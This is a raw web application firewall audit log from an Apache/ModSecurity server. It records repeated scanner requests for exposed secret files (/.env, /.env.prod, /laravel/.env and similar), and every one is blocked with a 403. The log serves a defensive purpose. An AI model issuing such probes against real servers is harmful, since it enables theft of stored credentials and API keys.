[file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746926036229768 751 (- - -) Stopwatch2: 1746926036229768 751; combined=305, p1=253, p2=0, p3=0, p4=0, p5=52, sr=75, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --24f68d32-Z-- --e5e2980e-A-- [11/May/2025:11:50:06 +0700] aCAsfgpy530QiWmSS60dAAAAAEM 103.236.140.4 55920 103.236.140.4 8181 --e5e2980e-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 161.35.85.22 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 161.35.85.22 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about); Accept: */* --e5e2980e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e5e2980e-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746939006340521 805 (- - -) Stopwatch2: 1746939006340521 805; combined=363, p1=322, p2=0, p3=0, p4=0, p5=40, sr=72, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e5e2980e-Z-- --69a1a547-A-- [11/May/2025:12:55:38 +0700] aCA72ubs1CLLACKj-_y-zQAAAJU 103.236.140.4 57546 103.236.140.4 8181 --69a1a547-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.86.175 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.86.175 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Linux; Android 6.0.1; SM-N910S) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.143 Mobile Safari/537.36 Accept-Charset: utf-8 --69a1a547-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --69a1a547-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746942938964632 876 (- - -) Stopwatch2: 1746942938964632 876; combined=317, p1=273, p2=0, p3=0, p4=0, p5=44, sr=76, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --69a1a547-Z-- --0fb9bd66-A-- [11/May/2025:14:14:23 +0700] aCBOT0EuxCpmyy5aJPm7hAAAAAg 103.236.140.4 54418 103.236.140.4 8181 --0fb9bd66-B-- GET /.env HTTP/1.0 Host: manage.bataranetwork.com X-Real-IP: 31.56.56.147 X-Forwarded-Host: manage.bataranetwork.com X-Forwarded-Server: manage.bataranetwork.com X-Forwarded-For: 31.56.56.147 X-Forwarded-Proto: http Connection: close User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 Accept: */* --0fb9bd66-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --0fb9bd66-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746947663246627 927 (- - -) Stopwatch2: 1746947663246627 927; combined=377, p1=314, p2=0, p3=0, p4=0, p5=63, sr=80, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0fb9bd66-Z-- --08bb633e-A-- [11/May/2025:14:31:11 +0700] aCBSP0EuxCpmyy5aJPm7jAAAAAE 103.236.140.4 54492 103.236.140.4 8181 --08bb633e-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 173.239.196.181 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 173.239.196.181 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36 Accept: */* --08bb633e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --08bb633e-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746948671204675 683 (- - -) Stopwatch2: 1746948671204675 683; combined=261, p1=226, p2=0, p3=0, p4=0, p5=35, sr=69, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --08bb633e-Z-- --aef59b4b-A-- [11/May/2025:14:31:11 +0700] aCBSPwpy530QiWmSS61dHAAAAFM 103.236.140.4 54494 103.236.140.4 8181 --aef59b4b-B-- POST /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 173.239.196.181 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 173.239.196.181 X-Forwarded-Proto: http Connection: close Content-Length: 13 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:105.0) Gecko/20100101 Firefox/105.0 Accept: */* Content-Type: application/x-www-form-urlencoded --aef59b4b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --aef59b4b-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746948671629900 694 (- - -) Stopwatch2: 1746948671629900 694; combined=278, p1=242, p2=0, p3=0, p4=0, p5=35, sr=75, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --aef59b4b-Z-- --576e2a30-A-- [11/May/2025:14:31:11 +0700] aCBSP0EuxCpmyy5aJPm7jQAAABA 103.236.140.4 54496 103.236.140.4 8181 --576e2a30-B-- GET /.env.save HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 173.239.196.181 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 173.239.196.181 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0 Accept: */* --576e2a30-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --576e2a30-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746948671979776 627 (- - -) Stopwatch2: 1746948671979776 627; combined=252, p1=219, p2=0, p3=0, p4=0, p5=33, sr=65, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --576e2a30-Z-- --33961051-A-- [11/May/2025:14:31:12 +0700] aCBSQApy530QiWmSS61dHQAAAEY 103.236.140.4 54498 103.236.140.4 8181 --33961051-B-- POST /.env.save HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 173.239.196.176 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 173.239.196.176 X-Forwarded-Proto: http Connection: close Content-Length: 13 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36 Accept: */* Content-Type: application/x-www-form-urlencoded --33961051-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --33961051-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746948672446836 644 (- - -) Stopwatch2: 1746948672446836 644; combined=251, p1=218, p2=0, p3=0, p4=0, p5=32, sr=65, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --33961051-Z-- --c1c7cb07-A-- [11/May/2025:14:31:13 +0700] aCBSQebs1CLLACKj-_zQRwAAAIA 103.236.140.4 54500 103.236.140.4 8181 --c1c7cb07-B-- GET /.env.old HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 173.239.196.176 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 173.239.196.176 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.0 Safari/605.1.15 Accept: */* --c1c7cb07-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c1c7cb07-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746948673224985 653 (- - -) Stopwatch2: 1746948673224985 653; combined=256, p1=220, p2=0, p3=0, p4=0, p5=36, sr=65, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c1c7cb07-Z-- --38d91f13-A-- [11/May/2025:14:31:13 +0700] aCBSQQpy530QiWmSS61dHgAAAEA 103.236.140.4 54502 103.236.140.4 8181 --38d91f13-B-- POST /.env.old HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 173.239.196.181 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 173.239.196.181 X-Forwarded-Proto: http Connection: close Content-Length: 13 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:106.0) Gecko/20100101 Firefox/106.0 Accept: */* Content-Type: application/x-www-form-urlencoded --38d91f13-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --38d91f13-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746948673567545 629 (- - -) Stopwatch2: 1746948673567545 629; combined=250, p1=218, p2=0, p3=0, p4=0, p5=32, sr=64, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --38d91f13-Z-- --de81ef40-A-- [11/May/2025:14:31:13 +0700] aCBSQUEuxCpmyy5aJPm7jgAAABY 103.236.140.4 54504 103.236.140.4 8181 --de81ef40-B-- GET /.env.prod HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 173.239.196.176 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 173.239.196.176 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36 Accept: */* --de81ef40-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --de81ef40-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746948673916852 640 (- - -) Stopwatch2: 1746948673916852 640; combined=244, p1=213, p2=0, p3=0, p4=0, p5=31, sr=65, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --de81ef40-Z-- --1bd32304-A-- [11/May/2025:14:31:14 +0700] aCBSQkEuxCpmyy5aJPm7jwAAABU 103.236.140.4 54506 103.236.140.4 8181 --1bd32304-B-- POST /.env.prod HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 173.239.196.181 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 173.239.196.181 X-Forwarded-Proto: http Connection: close Content-Length: 13 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36 Accept: */* Content-Type: application/x-www-form-urlencoded --1bd32304-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --1bd32304-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746948674433906 656 (- - -) Stopwatch2: 1746948674433906 656; combined=250, p1=218, p2=0, p3=0, p4=0, p5=32, sr=65, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1bd32304-Z-- --5e310a14-A-- [11/May/2025:14:31:14 +0700] aCBSQkEuxCpmyy5aJPm7kAAAAA0 103.236.140.4 54508 103.236.140.4 8181 --5e310a14-B-- GET /.env.production HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 173.239.196.178 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 173.239.196.178 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36 Accept: */* --5e310a14-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --5e310a14-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746948674815730 629 (- - -) Stopwatch2: 1746948674815730 629; combined=249, p1=218, p2=0, p3=0, p4=0, p5=31, sr=65, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5e310a14-Z-- --139a977c-A-- [11/May/2025:14:31:15 +0700] aCBSQ0EuxCpmyy5aJPm7kQAAAAM 103.236.140.4 54510 103.236.140.4 8181 --139a977c-B-- POST /.env.production HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 173.239.196.182 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 173.239.196.182 X-Forwarded-Proto: http Connection: close Content-Length: 13 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36 Accept: */* Content-Type: application/x-www-form-urlencoded --139a977c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --139a977c-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746948675179787 705 (- - -) Stopwatch2: 1746948675179787 705; combined=257, p1=225, p2=0, p3=0, p4=0, p5=31, sr=66, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --139a977c-Z-- --19fad02c-A-- [11/May/2025:14:31:15 +0700] aCBSQ-bs1CLLACKj-_zQSAAAAI8 103.236.140.4 54512 103.236.140.4 8181 --19fad02c-B-- GET /.env.development%20 HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 173.239.196.179 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 173.239.196.179 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36 Accept: */* --19fad02c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --19fad02c-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746948675536142 649 (- - -) Stopwatch2: 1746948675536142 649; combined=270, p1=233, p2=0, p3=0, p4=0, p5=37, sr=83, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --19fad02c-Z-- --c82aec3b-A-- [11/May/2025:14:31:16 +0700] aCBSREEuxCpmyy5aJPm7kgAAAAU 103.236.140.4 54514 103.236.140.4 8181 --c82aec3b-B-- POST /.env.development%20 HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 173.239.196.182 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 173.239.196.182 X-Forwarded-Proto: http Connection: close Content-Length: 13 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:106.0) Gecko/20100101 Firefox/106.0 Accept: */* Content-Type: application/x-www-form-urlencoded --c82aec3b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c82aec3b-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746948676368792 694 (- - -) Stopwatch2: 1746948676368792 694; combined=271, p1=228, p2=0, p3=0, p4=0, p5=42, sr=66, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c82aec3b-Z-- --9b2c1902-A-- [11/May/2025:14:31:16 +0700] aCBSRApy530QiWmSS61dHwAAAE8 103.236.140.4 54516 103.236.140.4 8181 --9b2c1902-B-- GET /laravel/.env%20 HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 173.239.196.177 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 173.239.196.177 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36 Accept: */* --9b2c1902-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --9b2c1902-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746948676944212 631 (- - -) Stopwatch2: 1746948676944212 631; combined=261, p1=229, p2=0, p3=0, p4=0, p5=32, sr=65, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9b2c1902-Z-- --7e442b4c-A-- [11/May/2025:14:31:17 +0700] aCBSRUEuxCpmyy5aJPm7kwAAAAI 103.236.140.4 54518 103.236.140.4 8181 --7e442b4c-B-- POST /laravel/.env%20 HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 173.239.196.180 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 173.239.196.180 X-Forwarded-Proto: http Connection: close Content-Length: 13 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36 Accept: */* Content-Type: application/x-www-form-urlencoded --7e442b4c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --7e442b4c-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746948677308152 852 (- - -) Stopwatch2: 1746948677308152 852; combined=342, p1=302, p2=0, p3=0, p4=0, p5=40, sr=75, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7e442b4c-Z-- --d869c22a-A-- [11/May/2025:14:31:17 +0700] aCBSRebs1CLLACKj-_zQSQAAAI0 103.236.140.4 54520 103.236.140.4 8181 --d869c22a-B-- GET /admin-app/.env%20 HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 173.239.196.178 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 173.239.196.178 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36 Accept: */* --d869c22a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d869c22a-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746948677720876 573 (- - -) Stopwatch2: 1746948677720876 573; combined=216, p1=188, p2=0, p3=0, p4=0, p5=28, sr=51, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d869c22a-Z-- --ed2cc810-A-- [11/May/2025:14:31:18 +0700] aCBSRgpy530QiWmSS61dIAAAAFU 103.236.140.4 54522 103.236.140.4 8181 --ed2cc810-B-- POST /admin-app/.env%20 HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 173.239.196.177 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 173.239.196.177 X-Forwarded-Proto: http Connection: close Content-Length: 13 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0 Accept: */* Content-Type: application/x-www-form-urlencoded --ed2cc810-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --ed2cc810-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746948678076549 688 (- - -) Stopwatch2: 1746948678076549 688; combined=271, p1=240, p2=0, p3=0, p4=0, p5=31, sr=83, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
